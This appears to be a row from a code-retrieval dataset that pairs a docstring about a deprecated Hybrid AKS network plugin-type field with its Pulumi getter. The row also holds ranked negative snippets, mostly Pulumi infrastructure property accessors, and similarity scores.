"def unclean_leader_election_enable(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"This field is deprecated and no longer functional.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"unclean_leader_election_enable is deprecated: This field is deprecated and no longer functional.\"\"\")\n\n return pulumi.get(self, \"unclean_leader_election_enable\")",
"def disable_probe(self) -> pulumi.Input[bool]:\n return pulumi.get(self, \"disable_probe\")",
"def enable_private_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_endpoint\")",
"def enable_private_nodes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_nodes\")",
"def enable_private_nodes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_nodes\")",
"def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")",
"def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")",
"def isNoModifiable(self):\n return self.f4 is '-'",
"def is_no_storage_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_no_storage_enabled\")",
"def is_no_storage_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_no_storage_enabled\")",
"def fix_has_no_advisory(self):\n fixed_in = self.fixed_artifact()\n return fixed_in and fixed_in.vendor_no_advisory",
"def allow_virtual_network_access(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_virtual_network_access\")",
"def allow_virtual_network_access(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_virtual_network_access\")",
"def post_network_ipam_create(self, resource_dict):\n pass",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def use_service_networking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_service_networking\")",
"def pre_network_ipam_update(self, resource_id, resource_dict):\n pass",
"def auto_assign(self) -> Optional[pulumi.Input[Union[str, 'BfdEnabled']]]:\n return pulumi.get(self, \"auto_assign\")",
"def nfc_beam_disabled(self, nfc_beam_disabled):\n\n self._nfc_beam_disabled = nfc_beam_disabled",
"def add_annotation_to_placement(self):\n\n config.switch_acm_ctx()\n placcement_obj = ocp.OCP(\n kind=constants.PLACEMENT_KIND,\n resource_name=self.appset_placement_name,\n namespace=\"openshift-gitops\",\n )\n placcement_obj.annotate(\n annotation=\"cluster.open-cluster-management.io/experimental-scheduling-disable='true'\"\n )",
"def check_disabled(self):\n return None",
"def public_access_behind_virtual_network_enabled(self) -> pulumi.Output[Optional[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def __init__(__self__, *,\n enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,\n enable_secure_boot: Optional[pulumi.Input[bool]] = None):\n if enable_integrity_monitoring is not None:\n pulumi.set(__self__, \"enable_integrity_monitoring\", enable_integrity_monitoring)\n if enable_secure_boot is not None:\n pulumi.set(__self__, \"enable_secure_boot\", enable_secure_boot)",
"def privileged(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"privileged\")",
"def privileged(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"privileged\")",
"def email_protection_flag(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"email_protection_flag\")",
"def email_protection_flag(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"email_protection_flag\")",
"def enable(self):\n return self._packet.get('enable', False)\n\n # TODO: TCONT and GEM lists",
"def __init__(__self__, *,\n disable: Optional[pulumi.Input[bool]] = None):\n if disable is not None:\n pulumi.set(__self__, \"disable\", disable)",
"def skip_metric_validation(self) -> Optional[bool]:\n return pulumi.get(self, \"skip_metric_validation\")",
"def skip_metric_validation(self) -> Optional[bool]:\n return pulumi.get(self, \"skip_metric_validation\")",
"def core_network_attachment_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_attachment_arn\")",
"def gateway_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def is_ap(self, obj):\n return hasattr(obj, 'attachment_point_info')",
"def policy_net(self) -> bool:\n raise NotImplementedError()",
"def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n evaluation_mode: Optional[pulumi.Input['BinaryAuthorizationEvaluationMode']] = None):\n if enabled is not None:\n warnings.warn(\"\"\"This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"enabled is deprecated: This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\")\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if evaluation_mode is not None:\n pulumi.set(__self__, \"evaluation_mode\", evaluation_mode)",
"def _disallow_public_access(self) -> typing.Optional[bool]:\n return jsii.get(self, \"disallowPublicAccess\")"
] | [
"0.6013737",
"0.6013737",
"0.57309324",
"0.56934357",
"0.5477145",
"0.52816826",
"0.52816826",
"0.5257691",
"0.52326876",
"0.5207934",
"0.5207934",
"0.5186799",
"0.5176646",
"0.5155211",
"0.51384276",
"0.51132184",
"0.51126623",
"0.5108996",
"0.5088345",
"0.5074993",
"0.50374025",
"0.50374025",
"0.502866",
"0.4987369",
"0.49835715",
"0.49835715",
"0.49746785",
"0.49510312",
"0.49510312",
"0.49333188",
"0.49175933",
"0.49175933",
"0.48913816",
"0.48889226",
"0.48697925",
"0.48672795",
"0.4862197",
"0.485626",
"0.48474213",
"0.48440838",
"0.48397937",
"0.48273247",
"0.4821657",
"0.48164827",
"0.48009",
"0.4798712",
"0.47872895",
"0.477853",
"0.47783735",
"0.47631282",
"0.47491297",
"0.47470894",
"0.47408387",
"0.4734773",
"0.47307208",
"0.4729707",
"0.47255903",
"0.47255903",
"0.47110194",
"0.47110194",
"0.47103104",
"0.47074825",
"0.47074825",
"0.4705467",
"0.46974277",
"0.46974277",
"0.4695587",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.469272",
"0.46838656",
"0.46782324",
"0.46675628",
"0.466535",
"0.46644998",
"0.46468756",
"0.4643937",
"0.4637061",
"0.46364728",
"0.46364728",
"0.46342462",
"0.46342462",
"0.46326265",
"0.46284676",
"0.46244952",
"0.46244952",
"0.462442",
"0.46117365",
"0.46091154",
"0.46012294",
"0.4598274",
"0.45979503"
] | 0.0 | -1 |
Field Deprecated. The field was previously optional, now it will have no defined behavior and will be ignored. The network plugin type for Hybrid AKS. | def hybrid_aks_plugin_type(self) -> Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]]:
return pulumi.get(self, "hybrid_aks_plugin_type") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def network_plugin(self) -> Optional[pulumi.Input[Union[str, 'NetworkPlugin']]]:\n return pulumi.get(self, \"network_plugin\")",
"def network_plugin_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkPluginMode']]]:\n return pulumi.get(self, \"network_plugin_mode\")",
"def get_network_plugin(self) -> Union[str, None]:\n\n return self._get_network_plugin(enable_validation=True)",
"def get_network_plugin_mode(self) -> Union[str, None]:\n return self._get_network_plugin_mode(enable_validation=True)",
"def _get_network_plugin(self, enable_validation: bool = False) -> Union[str, None]:\n # read the original value passed by the command\n network_plugin = self.raw_param.get(\"network_plugin\")\n # try to read the property value corresponding to the parameter from the `mc` object\n if (\n self.mc and\n self.mc.network_profile and\n self.mc.network_profile.network_plugin is not None\n ):\n network_plugin = self.mc.network_profile.network_plugin\n\n # this parameter does not need dynamic completion\n # validation\n if enable_validation:\n (\n pod_cidr,\n service_cidr,\n dns_service_ip,\n docker_bridge_address,\n network_policy,\n ) = self._get_pod_cidr_and_service_cidr_and_dns_service_ip_and_docker_bridge_address_and_network_policy(\n enable_validation=False\n )\n network_plugin_mode = self._get_network_plugin_mode(enable_validation=False)\n if network_plugin:\n if network_plugin == \"azure\" and pod_cidr and network_plugin_mode != \"overlay\":\n raise InvalidArgumentValueError(\n \"Please specify network plugin mode `overlay` when using --pod-cidr or \"\n \"use network plugin `kubenet`. For more information about Azure CNI \"\n \"Overlay please see https://aka.ms/aks/azure-cni-overlay\"\n )\n else:\n if (\n pod_cidr or\n service_cidr or\n dns_service_ip or\n docker_bridge_address or\n network_policy\n ):\n raise RequiredArgumentMissingError(\n \"Please explicitly specify the network plugin type\"\n )\n return network_plugin",
"def get_plugin_description(self):\n return (\"L3 Router Service Plugin for basic L3 forwarding\"\n \" using OVN\")",
"def get_plugin_description(self):\n return (\"L3 Router Service Plugin for basic L3 forwarding\"\n \" using OVN\")",
"def _validate_network_plugin(\n self, context, network_info,\n plugin_type=projectpluginmap.NsxPlugins.NSX_V):\n if not network_info.get('network_id'):\n msg = _(\"network_id must be specified\")\n raise n_exc.BadRequest(resource=bgp_ext.BGP_SPEAKER_RESOURCE_NAME,\n msg=msg)\n net_id = network_info['network_id']\n p = self._core_plugin._get_plugin_from_net_id(context, net_id)\n if p.plugin_type() != plugin_type:\n msg = (_('Network should belong to the %s plugin as the bgp '\n 'speaker') % plugin_type)\n raise n_exc.InvalidInput(error_message=msg)",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def AddNetworkFlag(parser):\n help_text = \"\"\"\\\n The VPC network from which the AlloyDB instance is accessible via private\n IP. For example, projects/myProject/global/networks/default. This setting\n cannot be updated after it is set.\n \"\"\"\n parser.add_argument('--network', help=help_text)",
"def network_configuration(self) -> Optional[pulumi.Input['ServiceNetworkConfigurationArgs']]:\n return pulumi.get(self, \"network_configuration\")",
"def network_configuration(self) -> Optional[pulumi.Input['ServiceNetworkConfigurationArgs']]:\n return pulumi.get(self, \"network_configuration\")",
"def network(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network\")",
"def use_service_networking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_service_networking\")",
"def scenario(self):\n warnings.simplefilter('always', PendingDeprecationWarning)\n warnings.warn(\n \"self.k.scenario will be deprecated in a future release. Please \"\n \"use self.k.network instead.\",\n PendingDeprecationWarning\n )\n return self.network",
"def get_ui_field_behaviour() -> dict[str, Any]:\n return {\n \"hidden_fields\": [\"port\", \"schema\"],\n \"relabeling\": {\"host\": \"Connection URL\"},\n }",
"def network_config(self) -> Optional[pulumi.Input['PrivateCloudNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def __init__(self):\n self.id = None\n self.typeInfo['id'] = 'string'\n \"\"\"availability of the network offering\"\"\"\n self.availability = None\n self.typeInfo['availability'] = 'string'\n \"\"\"true if network offering is ip conserve mode enabled\"\"\"\n self.conservemode = None\n self.typeInfo['conservemode'] = 'boolean'\n \"\"\"the date this network offering was created\"\"\"\n self.created = None\n self.typeInfo['created'] = 'date'\n \"\"\"additional key/value details tied with network offering\"\"\"\n self.details = None\n self.typeInfo['details'] = 'map'\n \"\"\"an alternate display text of the network offering.\"\"\"\n self.displaytext = None\n self.typeInfo['displaytext'] = 'string'\n \"\"\"true if guest network default egress policy is allow; false if default egress policy is deny\"\"\"\n self.egressdefaultpolicy = None\n self.typeInfo['egressdefaultpolicy'] = 'boolean'\n \"\"\"true if network offering can be used by VPC networks only\"\"\"\n self.forvpc = None\n self.typeInfo['forvpc'] = 'boolean'\n \"\"\"guest type of the network offering, can be Shared or Isolated\"\"\"\n self.guestiptype = None\n self.typeInfo['guestiptype'] = 'string'\n \"\"\"true if network offering is default, false otherwise\"\"\"\n self.isdefault = None\n self.typeInfo['isdefault'] = 'boolean'\n \"\"\"true if network offering supports persistent networks, false otherwise\"\"\"\n self.ispersistent = None\n self.typeInfo['ispersistent'] = 'boolean'\n \"\"\"maximum number of concurrents connections to be handled by lb\"\"\"\n self.maxconnections = None\n self.typeInfo['maxconnections'] = 'integer'\n \"\"\"the name of the network offering\"\"\"\n self.name = None\n self.typeInfo['name'] = 'string'\n \"\"\"data transfer rate in megabits per second allowed.\"\"\"\n self.networkrate = None\n self.typeInfo['networkrate'] = 'integer'\n \"\"\"the ID of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingid = None\n self.typeInfo['secondaryserviceofferingid'] = 'string'\n \"\"\"the name of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingname = None\n self.typeInfo['secondaryserviceofferingname'] = 'string'\n \"\"\"the ID of the service offering used by virtual router provider\"\"\"\n self.serviceofferingid = None\n self.typeInfo['serviceofferingid'] = 'string'\n \"\"\"the name of the service offering used by virtual router provider\"\"\"\n self.serviceofferingname = None\n self.typeInfo['serviceofferingname'] = 'string'\n \"\"\"true if network offering supports specifying ip ranges, false otherwise\"\"\"\n self.specifyipranges = None\n self.typeInfo['specifyipranges'] = 'boolean'\n \"\"\"true if network offering supports vlans, false otherwise\"\"\"\n self.specifyvlan = None\n self.typeInfo['specifyvlan'] = 'boolean'\n \"\"\"state of the network offering. Can be Disabled/Enabled/Inactive\"\"\"\n self.state = None\n self.typeInfo['state'] = 'string'\n \"\"\"true if network offering supports network that span multiple zones\"\"\"\n self.supportsstrechedl2subnet = None\n self.typeInfo['supportsstrechedl2subnet'] = 'boolean'\n \"\"\"the tags for the network offering\"\"\"\n self.tags = None\n self.typeInfo['tags'] = 'string'\n \"\"\"the traffic type for the network offering, supported types are Public, Management, Control, Guest, Vlan or Storage.\"\"\"\n self.traffictype = None\n self.typeInfo['traffictype'] = 'string'\n \"\"\"the list of supported services\"\"\"\n self.service = []",
"def backend_plugin(self):\n return None",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def ip_protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_protocol\")",
"def _commercial_fields(self):\n return ['website']",
"def plugin_name(self):\n return \"optipng\"",
"def instance_charge_type(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def instance_charge_type(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def block_override_dns_type(self) -> str:\n return pulumi.get(self, \"block_override_dns_type\")",
"def __init__(__self__, *,\n datapath_provider: Optional[pulumi.Input['NetworkConfigDatapathProvider']] = None,\n default_snat_status: Optional[pulumi.Input['DefaultSnatStatusArgs']] = None,\n dns_config: Optional[pulumi.Input['DNSConfigArgs']] = None,\n enable_intra_node_visibility: Optional[pulumi.Input[bool]] = None,\n enable_l4ilb_subsetting: Optional[pulumi.Input[bool]] = None,\n gateway_api_config: Optional[pulumi.Input['GatewayAPIConfigArgs']] = None,\n private_ipv6_google_access: Optional[pulumi.Input['NetworkConfigPrivateIpv6GoogleAccess']] = None,\n service_external_ips_config: Optional[pulumi.Input['ServiceExternalIPsConfigArgs']] = None):\n if datapath_provider is not None:\n pulumi.set(__self__, \"datapath_provider\", datapath_provider)\n if default_snat_status is not None:\n pulumi.set(__self__, \"default_snat_status\", default_snat_status)\n if dns_config is not None:\n pulumi.set(__self__, \"dns_config\", dns_config)\n if enable_intra_node_visibility is not None:\n pulumi.set(__self__, \"enable_intra_node_visibility\", enable_intra_node_visibility)\n if enable_l4ilb_subsetting is not None:\n pulumi.set(__self__, \"enable_l4ilb_subsetting\", enable_l4ilb_subsetting)\n if gateway_api_config is not None:\n pulumi.set(__self__, \"gateway_api_config\", gateway_api_config)\n if private_ipv6_google_access is not None:\n pulumi.set(__self__, \"private_ipv6_google_access\", private_ipv6_google_access)\n if service_external_ips_config is not None:\n pulumi.set(__self__, \"service_external_ips_config\", service_external_ips_config)",
"def type(self, type):\n allowed_values = [\"android\", \"ios\"]\n if type.lower() not in map(str.lower, allowed_values):\n # print(\"Invalid value for type -> \" + type)\n self._type = \"outdated_sdk_version\"\n else:\n self._type = type",
"def network_dataplane(self) -> Optional[pulumi.Input[Union[str, 'NetworkDataplane']]]:\n return pulumi.get(self, \"network_dataplane\")",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def type(self) -> Optional[pulumi.Input['ClusterTelemetryType']]:\n return pulumi.get(self, \"type\")",
"def network_config(self) -> pulumi.Input['PrivateCloudNetworkConfigArgs']:\n return pulumi.get(self, \"network_config\")",
"def protocol(self):\n raise UnsupportedCall(f\"'{self.__class__.__name__}' object has no attribute 'protocol'\")",
"def internet_advertising_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def network_config(self) -> Optional[pulumi.Input['NodeNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def trafficProtocol(self):\n #\n # TODO: Reimplement this if possible.\n #\n return client.trafficProtocol(self)",
"def network_interface(self): \n return self._network_interface",
"def network_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkMode']]]:\n return pulumi.get(self, \"network_mode\")",
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def protocol(self) -> Optional[pulumi.Input[Union[str, 'Protocol']]]:\n return pulumi.get(self, \"protocol\")",
"def _configure_neutron_api(self):\n logging.info('Configuring `manage-neutron-plugin-legacy-mode` for '\n 'neutron-api...')\n n_api_config = {\n 'manage-neutron-plugin-legacy-mode': False,\n }\n with self.config_change(\n n_api_config, n_api_config, 'neutron-api'):\n logging.info('done')",
"def get_network_dataplane(self) -> Union[str, None]:\n return self.raw_param.get(\"network_dataplane\")",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def add_field(self, field_name, label, description, type, function=None):\n new_field = {\n \"label\": label,\n \"description\": description,\n \"type\": type,\n }\n if function is not None:\n new_field[\"source\"] = \"function\"\n self.fields[field_name] = function\n else:\n new_field[\"source\"] = \"system\"\n self.fields[field_name] = \"No value\"\n self.description[\"fields\"][\"values\"][field_name] = new_field\n\n # update MongoDB\n #self.mongo_client.cps2_project.objects.update_one(\n #{\"_id\": self.mongo_id},\n #{\"$set\": {\"fields.values.\" + field_name: new_field,\n #\"last_modified.value\": str(datetime.utcnow())}\n #}\n #)\n print(\"Added a new field called \\\"\" + field_name + \"\\\" and updated MongoDB.\")",
"def provider(self) -> Optional[pulumi.Input['NetworkPolicyProvider']]:\n return pulumi.get(self, \"provider\")",
"def get_default_config(self):\n if not self.iface_type:\n return None\n\n defaults = {}\n defaults['description'] = self.interface_name + ' Interface'\n defaults['admin'] = 'up'\n if self.is_ethernet:\n defaults['speed'] = 'auto'\n defaults['duplex'] = 'auto'\n defaults['type'] = 'bridged'\n elif self.iface_type == 'Bridge-Aggregation':\n defaults['type'] = 'bridged'\n else:\n defaults['type'] = 'routed'\n\n return defaults",
"def node_topology(self) -> \"LabelSelector\":\n return typing.cast(\n \"LabelSelector\",\n self._properties.get(\"nodeTopology\"),\n )",
"def server_type(self):\n ...",
"def accelerated_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"accelerated_network\")",
"def get_plugin_type(self):\n return constants.L2GW",
"def set_network_connection_type(self,param={},ignore_error_handle = False):\n message = {};\n step = 'set network connection type \\'' + str(param.get('network_type',0)) + '\\'';\n network_type = param.get('network_type',0);\n try:\n if network_type == 0:\n self.driver.set_network_connection(ConnectionType.NO_CONNECTION);\n elif network_type == 1:\n self.driver.set_network_connection(ConnectionType.AIRPLANE_MODE);\n elif network_type == 2:\n self.driver.set_network_connection(ConnectionType.WIFI_ONLY);\n elif network_type == 4:\n self.driver.set_network_connection(ConnectionType.DATA_ONLY);\n elif network_type == 6:\n self.driver.set_network_connection(ConnectionType.ALL_NETWORK_ON);\n else:\n self.driver.set_network_connection(ConnectionType.NO_CONNECTION);\n message = self.feedback.feedback_action_ok(step);\n except BaseException,e:\n message = self.feedback.feedback_action_fail(step,str(e),ignore_error_handle);\n finally:\n return message;",
"def getProtocol(self) -> str:\n ...",
"def __init__(__self__, *,\n ip_tag_type: Optional[pulumi.Input[str]] = None,\n tag: Optional[pulumi.Input[str]] = None):\n if ip_tag_type is not None:\n pulumi.set(__self__, \"ip_tag_type\", ip_tag_type)\n if tag is not None:\n pulumi.set(__self__, \"tag\", tag)",
"def ip_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_type\")",
"def __init__(__self__, *,\n type: Optional[pulumi.Input['ClusterTelemetryType']] = None):\n if type is not None:\n pulumi.set(__self__, \"type\", type)",
"def protocol(self):\n ...",
"def network_profile(self) -> Optional[pulumi.Input['NetworkProfileArgs']]:\n return pulumi.get(self, \"network_profile\")",
"def network_profile(self) -> Optional[pulumi.Input['NetworkProfileArgs']]:\n return pulumi.get(self, \"network_profile\")",
"def _get_protocol_type(self):\n return self.__protocol_type",
"def __init__(__self__, *,\n customer_gateway_id: pulumi.Input[str],\n type: pulumi.Input[str],\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n pulumi.set(__self__, \"type\", type)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not 